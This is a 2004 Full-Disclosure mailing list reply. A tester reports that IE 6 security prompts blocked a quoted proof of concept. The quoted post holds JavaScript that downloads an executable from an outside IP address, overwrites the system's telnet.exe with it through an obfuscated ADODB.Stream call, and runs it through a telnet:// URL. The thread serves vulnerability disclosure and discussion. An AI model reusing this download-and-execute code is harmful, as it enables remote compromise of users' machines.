Michael, Out of curiosity, I tested this with IE 6.0.2800.1106.xpsp2.030422-1633 and got a popup box saying:
"This page is accessing information that is not under its control. This poses a security risk. Do you want to continue?" [Yes] [No] And that was loading it into IE as a *local file*...when I put it on a web page, I got the usual half dozen alerts about "do you want to run javascript", etc. that even if I said yes to it didn't work. Did you get that popup box when you tested your script below ? Darren > In reply the discussion found at: > > http://seclists.org/lists/fulldisclosure/2004/Jul/0528.html > > the consesus seems to be that there are no obvious ways to exploit the > mentioned URL types, such as tn3270, telnet, LDAP, rlogin etc. While > these may not be exploitable per se, they certainly are when used in > conjction with other known exploits. Take the following code for > example: > > var downloadurl="http://213.159.117.133/dl/loadadv74.exe"; > > if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1) > savetopath="C:\\WINDOWS\\system32\\telnet.exe"; > > if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1) > savetopath="C:\\WINNT\\system32\\telnet.exe"; > > payloadURL = downloadurl; > > var x = new ActiveXObject("Microsoft.XMLHTTP"); > x.Open("GET",payloadURL,0); > x.Send(); > > function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" > + "r" + "e" + "a" + "m"; } > var s = new ActiveXObject(bla()); > > s.Mode = 3; > s.Type = 1; > s.Open(); > s.Write(x.responseBody); > s.SaveToFile(savetopath,2); > > location.href = "telnet://"; > > The JavaScript overwrites telnet.exe with a downloaded executable and > then runs it by pointing the browser at telnet://. Instead of > launching a telnet shell as expected, the attackers code is executed. > This is not only an example of the telnet URL type being involved in > an exploit, but one that actually relies on it. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html